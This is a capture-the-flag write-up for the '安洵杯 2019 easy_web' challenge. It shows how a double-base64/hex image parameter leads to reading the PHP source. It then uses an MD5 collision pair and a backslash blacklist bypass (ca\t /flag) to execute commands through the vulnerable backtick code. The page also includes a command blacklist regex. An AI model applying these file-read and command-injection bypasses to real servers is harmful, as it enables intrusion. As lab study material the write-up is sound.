[安洵杯 2019]easy_web

[复制链接]

8242

主题

8330

帖子

2万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
27056
Posted on 2022-2-12 14:35:42
(screenshot: https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png)

The challenge opens as shown, with the URL ?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= ; at the same time I viewed the page source.
(screenshot: https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png)

There is a hint "MD5 is funny", which suggests the challenge most likely revolves around MD5.

I then captured the request; there was nothing special in the headers, so I started from the URL.

First, base64-decode the img value once.

(screenshot: https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png)
After one decoding the result still looks like base64, so decode it once more.

(screenshot: https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png)
Then hex-decode it, which gives:

```text
555.png
```
Encode index.php the same way (hex, then base64 twice):

```text
TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
```

Then enter it in the address bar.
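The encoding chain just walked through, as an added Python example that is not part of the original post: it reproduces both directions (hex, then base64 twice, and the server's reverse of it), the character whitelist and the "flag" check that the decoded source enforces on the result, and it tolerates the missing "=" padding in the challenge's own img value, which PHP's base64_decode accepts but Python's does not. The two constants are the values from this writeup.

```python
import base64
import binascii
import re

# Values taken from the writeup: the img the challenge links to, and the one
# computed for index.php. The server decodes ?img= as
# hex2bin(base64_decode(base64_decode($img))), then keeps only [a-zA-Z0-9.]
# and refuses any name containing "flag".
ORIGINAL_IMG = "TXpVek5UTTFNbVUzTURabE5qYz0"
INDEX_IMG = "TmprMlpUWTBOalUzT0RKbE56QTJPRGN3"


def lenient_b64decode(s: str) -> bytes:
    """Decode like PHP's base64_decode, which tolerates missing '=' padding.
    ORIGINAL_IMG is 27 chars; Python's b64decode rejects it without this."""
    s = s.strip()
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_img(img: str) -> str:
    """Reverse chain: base64 -> base64 -> hex -> filename."""
    hexed = lenient_b64decode(lenient_b64decode(img).decode("ascii"))
    return binascii.unhexlify(hexed).decode("latin-1")


def encode_img(filename: str) -> str:
    """Forward chain used to request another file: hex -> base64 -> base64."""
    hexed = binascii.hexlify(filename.encode("latin-1"))
    return base64.b64encode(base64.b64encode(hexed)).decode("ascii")


def sanitize(filename: str) -> str:
    """Mirror preg_replace("/[^a-zA-Z0-9.]+/", "", $file)."""
    return re.sub(r"[^a-zA-Z0-9.]+", "", filename)


def server_would_read(img: str) -> tuple[str, bool]:
    """(name after sanitising, allowed?) exactly as the PHP decides it."""
    name = sanitize(decode_img(img))
    return name, re.search(r"flag", name, re.IGNORECASE) is None


if __name__ == "__main__":
    print(decode_img(ORIGINAL_IMG))                 # 555.png
    print(encode_img("index.php"))                  # TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
    # slashes are stripped first, then the remaining "flag" is refused
    print(server_would_read(encode_img("/flag")))   # ('flag', False)
```

Note that encode_img("555.png") yields the 28-character padded form; the challenge's own link drops the trailing "=", which is why the lenient decoder is needed.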
Then view the page source and decode the long base64 string found in it:

```php
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
// img is decoded as base64 -> base64 -> hex, reduced to [a-zA-Z0-9.],
// and refused if the result contains "flag"
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
// blacklist of command names and shell metacharacters applied to cmd
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    // cmd is executed only when a and b differ but share an MD5 digest
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
```
Combined with the earlier inference, the key code is:

```php
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
```
This MD5 check calls for an MD5 "strong collision": since === is used, a and b must be different strings whose MD5 digests are identical.

```text
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
```

```text
b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
```
That alone is enough for the content of cmd to be handled as a command.

So the payload used is:

(screenshot: https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png)

Because '\' is not filtered, the filter can be bypassed this way:
ls and l\s give the same result when executed.
I then found /flag in the root directory.

So the payload is:

```text
?cmd=ca\t%20/flag
```

For this challenge, since sort and dir are not blocked, dir can also replace ls for listing, and sort can replace cat.